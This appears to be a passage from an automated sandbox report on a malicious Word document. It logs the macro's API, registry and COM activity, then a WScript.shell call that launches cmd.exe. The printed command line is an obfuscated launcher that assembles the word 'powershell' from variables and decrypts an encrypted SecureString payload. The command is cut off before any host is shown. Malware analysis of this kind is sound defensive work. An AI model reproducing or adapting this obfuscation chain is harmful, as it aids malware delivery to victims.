| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = MonitorFromPoint, address_out = 0x76dfab64 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = EnumDisplayMonitors, address_out = 0x76e05c30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = GetMonitorInfoA, address_out = 0x76dfa730 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = EnumDisplayDevicesA, address_out = 0x76dfa5b4 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Handle | module_name = oleaut32.dll, base_address = 0x7fefe910000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = DispCallFunc, address_out = 0x7fefe912270 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = LoadTypeLibEx, address_out = 0x7fefe91a550 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = UnRegisterTypeLib, address_out = 0x7fefe9a20d0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = CreateTypeLib2, address_out = 0x7fefe99dbd0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarDateFromUdate, address_out = 0x7fefe915c90 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarUdateFromDate, address_out = 0x7fefe916330 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = GetAltMonthNames, address_out = 0x7fefe9366c0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarNumFromParseNum, address_out = 0x7fefe914710 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarParseNumFromStr, address_out = 0x7fefe9148f0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarDecFromR4, address_out = 0x7fefe94b640 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarDecFromR8, address_out = 0x7fefe94b360 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarDecFromDate, address_out = 0x7fefe952640 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarDecFromI4, address_out = 0x7fefe9358a0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarDecFromCy, address_out = 0x7fefe935820 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarR4FromDec, address_out = 0x7fefe94af20 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = GetRecordInfoFromTypeInfo, address_out = 0x7fefe96a0c0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = GetRecordInfoFromGuids, address_out = 0x7fefe9a2160 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = SafeArrayGetRecordInfo, address_out = 0x7fefe935af0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = SafeArraySetRecordInfo, address_out = 0x7fefe935a90 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = SafeArrayGetIID, address_out = 0x7fefe935a60 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = SafeArraySetIID, address_out = 0x7fefe935a30 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = SafeArrayCopyData, address_out = 0x7fefe9160b0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = SafeArrayAllocDescriptorEx, address_out = 0x7fefe913e90 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = SafeArrayCreateEx, address_out = 0x7fefe969f80 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarFormat, address_out = 0x7fefe999b20 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarFormatDateTime, address_out = 0x7fefe999aa0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarFormatNumber, address_out = 0x7fefe999990 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarFormatPercent, address_out = 0x7fefe999890 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarFormatCurrency, address_out = 0x7fefe999770 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarWeekdayName, address_out = 0x7fefe97b8d0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarMonthName, address_out = 0x7fefe97b800 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarAdd, address_out = 0x7fefe9948e0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarAnd, address_out = 0x7fefe999470 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarCat, address_out = 0x7fefe9996a0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarDiv, address_out = 0x7fefe992fe0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarEqv, address_out = 0x7fefe999cf0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarIdiv, address_out = 0x7fefe998ff0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarImp, address_out = 0x7fefe999c00 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarMod, address_out = 0x7fefe998e60 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarMul, address_out = 0x7fefe993690 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarOr, address_out = 0x7fefe9992d0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarPow, address_out = 0x7fefe992e80 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarSub, address_out = 0x7fefe993f90 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarXor, address_out = 0x7fefe9991a0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarAbs, address_out = 0x7fefe977c30 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarFix, address_out = 0x7fefe977a60 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarInt, address_out = 0x7fefe977890 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarNeg, address_out = 0x7fefe977ea0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarNot, address_out = 0x7fefe999600 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarRound, address_out = 0x7fefe9776a0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarCmp, address_out = 0x7fefe9983f0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarDecAdd, address_out = 0x7fefe943070 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarDecCmp, address_out = 0x7fefe94d700 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarBstrCat, address_out = 0x7fefe94d890 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarCyMulI4, address_out = 0x7fefe92caf0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarBstrCmp, address_out = 0x7fefe938a00 |
|
1 | |
| System | Get Time | type = Local Time, time = 2018-04-05 07:21:18 (Local Time) |
|
2 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = RequireDeclaration, data = 122, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = CompileOnDemand, data = 0, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = NotifyUserBeforeStateLoss, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = BackGroundCompile, data = 0, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = BreakOnAllErrors, data = 255, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = BreakOnServerErrors, data = 0, type = REG_NONE |
|
1 | |
| Module | Get Address | module_name = Unknown module name, address_out = 0x7fee1dffcd0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\409 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\9 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64, data = C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB |
|
1 | |
| Module | Get Filename | process_name = c:\program files\microsoft office\root\office16\winword.exe, file_name_orig = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL, size = 260 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64, data = C:\Windows\system32\stdole2.tlb |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64, data = C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL |
|
1 | |
| System | Get Time | type = Local Time, time = 2018-04-05 07:21:18 (Local Time) |
|
4 | |
| System | Get Cursor | x_out = 361, y_out = 884 |
|
1 | |
| System | Get Time | type = Local Time, time = 2018-04-05 07:21:18 (Local Time) |
|
2 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\409 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\9 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64, data = C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB |
|
1 | |
| System | Get Time | type = Local Time, time = 2018-04-05 07:21:18 (Local Time) |
|
1 | |
| System | Get Cursor | x_out = 361, y_out = 884 |
|
1 | |
| System | Get Time | type = Local Time, time = 2018-04-05 07:21:19 (Local Time) |
|
2 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = VbaCapability, data = 26 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x7fee2510000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 582, address_out = 0x7fee28232b4 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x7fee2510000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 583, address_out = 0x7fee2822400 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x7fee2510000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 712, address_out = 0x7fee2899db0 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x7fee2510000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 632, address_out = 0x7fee267d6f0 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x7fee2510000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 608, address_out = 0x7fee267ae28 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x7fee2510000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 716, address_out = 0x7fee28524c8 |
|
1 | |
| COM | Get Class ID | cls_id = 72C24DD5-D70A-438B-8A42-98424B88AFB8, prog_id = WSCript.shell |
|
1 | |
| COM | Create | interface = 00000000-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 | |
| Process | Create | process_name = Cmd tQZwbXH KCoJvcWVmThmQFEmEKTc lBUvzuulqjniw & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %mSjUIVjKCvrosnG%=YaAhiJLINtE&&set %iibdZAhWS%=p&&set %UKkjOWmc%=o^w&&set %CKJHjErkGaOznLZ%=UbmSUqbPikMOd&&set %orvBFUr%=!%iibdZAhWS%!&&set %GaGORjztoIjBCAG%=bMVIRrhb&&set %miGHuQvztiW%=e^r&&set %PRCHEZFPHY%=!%UKkjOWmc%!&&set %PqsKzFkV%=s&&set %bjMitdwscHzzIkV%=ZzjSCRRpVGC&&set %McrAWpDQaNJ%=he&&set %jwjXbhMi%=ll&&!%orvBFUr%!!%PRCHEZFPHY%!!%miGHuQvztiW%!!%PqsKzFkV%!!%McrAWpDQaNJ%!!%jwjXbhMi%! " ( [rUnTImE.INteRoPsERvICEs.MARshAl]::PTrTOsTrIngbSTR([RUNtIMe.INtEROpserVIcEs.MarshAL]::securEStRinGtObsTR( $('76492d1116743f0423413b16050a5345MgB8AHgAdgBHAHQANgB4AHIANwAyAFUANgBzAEsAbgB2AC8ANAA2ADQAaQByAHcAPQA9AHwANQBiADIAZABjAGYAZQBkAGMAMAA3AGMAYgA5ADAANgBkAGYAMwBjAGQANQBkADEANAA0ADgAOAA1ADkAYwBjADcAYQAzADcAYwBmAGQAZQBjADcANAAwAGIAZgAwAGYANwBlADkANgA2ADIAZgAxADcAMABiADYAYgBkADcAZQA2AGMAZQA5ADYAZgBhAGYAZgBiAGYAOQBjADEAYQBhADIAYgA5ADUAYQA1ADUAMwBmADkAYwAwAGYANwA5AGMANgA0ADEANwA2AGEAYgA0ADQAYgBmAGIANgBmADgAMAAzADYAOQA3AGIAYgBiADAANgA2AGEANQA4ADYAYQA0ADEAMABlAGUANgA4ADAAYgAyAGEAMgA5AGUAOQBkADQAOAA1ADQAYQAyADAAYQA4AGUANQA0AGYAMQAyAGQAYwBhADAANABmADMANABlAGMAZgA1AGUAMgAzADEANwBjADQAMgBkAGEAMQBmAGUAMwBiADYAYgBlADQAMgAzADMAMwAyAGIANgA4AGUAYgA1ADQAMQBlADQANwAyADUAZQBjADEAOQBlAGMANABiAGEAYwBiADAAMABjAGQAYwA1AGQAYQA4ADAANQBhADUANAAyAGUANAAzADUAOABmADcAMgAwADYAYQA2AGYAYwA4ADUAMgA5ADkAMwA5ADcAYwA5ADYAMQBiADgAYgA0ADIAMgBiADUANgAzAGQAYgA5AGUAMgA0ADAANABhADEANQA4AGMAZQBhAGUAMAA3AGEANwAzADUAZQBjADMAMwBiAGUANABlADYAMAA1ADkAMABmAGMAMQAzADcAMQAwADIAOQAxADYAMAA4ADYAMwAyADUAMAA3AGQAYgBiADQAMQBhAGIAYgBkAGYAZgA0AGMANwA0ADMAYwA4ADkAYQBkAGYAOAA5ADQAYQBhAGMAZgAyADUANwBhADEANAA1AGQAZQA0ADAAYQA3ADUANQAxADIAOQAzAGIAZgA0AGMAMwAyADQAMgA2ADQANgBiADEAOQBjAGEAYQAxADkAZAA4ADMANQAwADIAYwAzADEAZQA2AGEAOQAxADUAOAA4AGYAZgAxADMAMwBjADUANQAwADYAMwBmADkANQBmADcAOQBjADUAMABiADMANwAwAGEAMgAzADUAYQAzADMAYgA1ADQAMwBkADQAZABhADQAYwA5ADIAMgBiAGIAZQA1ADgAYgBlAGEANgAyADMANwA5ADgAZAA4ADQAMgBmADQAMQBmAGMAOAA0ADAAZgBmADYAMAA2AGIAMQA5AGYAMgBmAGUAYwAxADUAMwA5ADkAMgBjADEANQAyADEAOABlAGYAMQAxADQAYQBhADUAOABjADcANQA3AGQAZgAzADIAMABjAGEAMAA5AGUAMAAwADAAMAAzADkANgA2ADgAZgBjADAAOQA2AGIAMQAwAGYAMwBiAGUAYQAxADIAMAAxADMAZQAyADQAZAA0ADcANQAxAGUANwAyAGQAMwBlAGUAYgA2AGIAMwBiADIAMgA2ADEAYgAwADcAOAA2ADcAOQA3ADEAYwA1ADIAZgBhADYANAA4ADIAMgAwADIAZAA2AGQANQBhADEANwA4ADUANgAwADIANABhADgAMAA5AGUAMgA1AGMANwBjADgANwBjAGQAZQAwAGUANABkADcAYwA2ADUAYQBhADAAYwBhADgANQBkADgANgBjADMAYwA1ADUAYgA5ADYAZQBmADUAOABhAGEANgAwADcAOAA3ADUANQA0ADkANgAzAGYAZAA2ADAAMwAzADAAYwBkADQAOQBkAGMAZgAyAGMANQA2AGQAYgBhAGIAZQBmADkAYQBjAGMAMABiADgANgA1AGMAYQBhAGEAMQAzAGQAMAAzADUAZABjADkAZQBjADcAZAA2ADAANAAxAGYAMwA2ADQAOAA3ADAAZAAwADUANwA3ADYANABkADQAOABkADQAMwBlADIAYwBlADEANQA2ADMAZgBjADYAOQBlADIANwA1ADIAYgA4ADcAMwBiADgAMQA1ADcAYgBlADUANQA5ADgAMgBkADkANQBhADUAMQA5AGUAOQBlAGYAZgBmAGIAYQA2AGUANwA2AGUANAA0ADgAYgAzADMAZQBhADgAZQAzAGQANwAxADUAMwA4ADkAZQA5ADgANAA3ADUAYQA0ADcAOAAyAGIAMgBiADAAMQA4AGEAOQA0ADAAMQAwAGQAZQA2AGMANwA3ADkAOAA0AGIAZgAxADAANABhAGMAYwBkADcANgA4ADkAYgAxADYANgA0AGQAMgBjADIAYgA1ADkANQAzADIAZAAzADEANQA2ADQAZQBlADYAMQA1AGUAYgBhAGUANAA1ADEAYwAzAGQANwA0ADgAOAA5AGQAZQA2AGEANgBjADIAMABjADgAYQAwADUANQA5ADIAMgAxADAAMABkAGQANABmADAAOABhADAAMABmAGYANQA0ADgAYgA1AGMAZQBjAGIANABkADMAOQAyADAANgBjAGMANABiAGEAZQA3AGQANQBlAGYAOQA2AGUAMgBmADcAMwBmAGIANgBkADcAZAAwADQANwA0AGUANgAyAGQAYgA5AGMANgBlADQAOQBmADgAMwA2ADkANwA5ADAANgAxADIANwA4ADEANwA4AGEAMQBiADgAOAA3ADMANQBjAGUANQA4ADgAYwA1ADMAMgBkADgANAA1AGIAMwA5ADQAYQBmADAANQBiAGIAMwA5ADMAMQA5ADUANAA2AGUAZQA1ADgAOAAyADAANQAxADUAMgBiAGMAMwBkAGIAYwBiADkAOQA3AGUAMQA4ADgANwBmAGQAMAAwADAANAA1AGYAYwA0AGUAZAAwAGIAOQBjADQAOAAxADcANABiAGYAMABlADgAYgBmADIAZgBjAGMANQA2ADQANAAxADcANQAyADQAZgA4ADMANABlAGYAOABhADcAMAA3ADgANABlADQAYwA5AGIAYQAzADQANgA4AGUAOABlAGMAYQAxADYAOABjAGEAZgAxADcAZgA3AGMAZQBlADMANwAwAGEAYgAzADYAZgBkAGIANgA3ADcAOAAxAGEANQA5ADQAZgBjADAAMgBmADgANgAzADQANgAwAGMAYwAwAGMAZgBjADcAYwBlADYAYgBmADQAYgAzAGYANQBlAGQAMgBmAGIAMgA5ADEAOQBjAGMAYgBiADMAMwBjAGIAYwBhAGMAYQBlADkAOQA0ADcAOAA0ADUAOABhADMAYgBlADMANwBkADcAZQAwADAAMwBhADcAYgBlAGIAYQAxAGYAZQBhADEAMABhADkAOAA0ADgAMwA1AGMAMwA0ADkAZAA4ADkAZQA4ADkAYgA4ADAANAA2ADMAYgAyADAANgA2AGUAZAA0ADUAYwA5ADIANAA1ADcAMgA3ADEANwAyAGQAYQAyADEAZQA3AGMANABkADUAYgAzADAAYwA0ADkAOQBlAGYAZQBkAGYAMABlAGEAZABmADIANwBlADkAOQA1AGQAMwBmAGQAYgBjADEAMwA3ADMAMwBlAGMAOQBiADEAMwA3AGUAZgBjADUAOABlADMAYwA3ADEAOAAwADUAYwA1ADAAZQA2AGEAYgA0AGQAMgA0ADQANgBmADMAZQBhAGMANwA5AGYAMQBlAGYANwBmADIAYgAyADkAOABhADgAZABiADMAZABkADYAOQBiADUAOAAwADMANgA5AGUAOABkAGUANgBlAGUAMgBlADgAMwA4ADkAOAAyADAAMQBlAGIAZABiADUAMwBlADQAZQBhADcAYQBlAGEAMwBhADQAOABlADAAYwA2AGQAZABhADgAZgAwADYANQBjADMAMwAwAGQANQA2ADkANQBiAGQANQA4ADMAZgBhAGMAMwA2AGMAZgA4ADUAMQA2ADUAMABmAGUAMQA5AGUAMQAxADQANABhADQAZAA5ADUANABkAGIANwA3ADAAMABiADEAOQA4ADYAOQAxADMAYgAxAGYAMgA4ADYAZgBiADUAZgBjADYAOQBlADMAZQBjAGQANwBkAGIANAA3ADMAZAA0ADMAZQBlAGYAYwA1AGYAZgA5AGUANAA2ADUAOAA1ADYANwAzAGEAZQAzADUAMABhADgAMgA0ADEAMwAzAGYAYwAwADAANgA0AGIAZQAwAGQANQBkAGYAYQAxADIAZQBlAGYAOAA1ADgAZgA5ADgAMwA2ADIAOQAwAGMAMQAwADcAMAA0ADQAYgA4AGEAZgAwADkANgA2ADUANAA3AGMAMgBlADIAYgA3AGUAOQBlADgAZQBiAGIAMABhAGYANgAyAGEAMQA0AGEAYQBhADUAMAA4AGIANAA0ADMAYgBmA |
|
1 | |
| System | Get Cursor | x_out = 361, y_out = 884 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x7fee2510000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 582, address_out = 0x7fee28232b4 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x7fee2510000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 583, address_out = 0x7fee2822400 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x7fee2510000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 608, address_out = 0x7fee267ae28 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x7fee2510000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 712, address_out = 0x7fee2899db0 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x7fee2510000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 716, address_out = 0x7fee28524c8 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x7fee2510000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 632, address_out = 0x7fee267d6f0 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x7fee2510000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 582, address_out = 0x7fee28232b4 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x7fee2510000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 583, address_out = 0x7fee2822400 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x7fee2510000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 608, address_out = 0x7fee267ae28 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x7fee2510000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 712, address_out = 0x7fee2899db0 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x7fee2510000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 716, address_out = 0x7fee28524c8 |
|
1 | |
| Module | Load | module_name = VBE7.DLL, base_address = 0x7fee2510000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = 632, address_out = 0x7fee267d6f0 |
|
1 |
Process #2: cmd.exe
109
0
| Information | Value |
|---|---|
| ID | #2 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | "C:\Windows\System32\cmd.exe" tQZwbXH KCoJvcWVmThmQFEmEKTc lBUvzuulqjniw & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %mSjUIVjKCvrosnG%=YaAhiJLINtE&&set %iibdZAhWS%=p&&set %UKkjOWmc%=o^w&&set %CKJHjErkGaOznLZ%=UbmSUqbPikMOd&&set %orvBFUr%=!%iibdZAhWS%!&&set %GaGORjztoIjBCAG%=bMVIRrhb&&set %miGHuQvztiW%=e^r&&set %PRCHEZFPHY%=!%UKkjOWmc%!&&set %PqsKzFkV%=s&&set %bjMitdwscHzzIkV%=ZzjSCRRpVGC&&set %McrAWpDQaNJ%=he&&set %jwjXbhMi%=ll&&!%orvBFUr%!!%PRCHEZFPHY%!!%miGHuQvztiW%!!%PqsKzFkV%!!%McrAWpDQaNJ%!!%jwjXbhMi%! " ( [rUnTImE.INteRoPsERvICEs.MARshAl]::PTrTOsTrIngbSTR([RUNtIMe.INtEROpserVIcEs.MarshAL]::securEStRinGtObsTR( 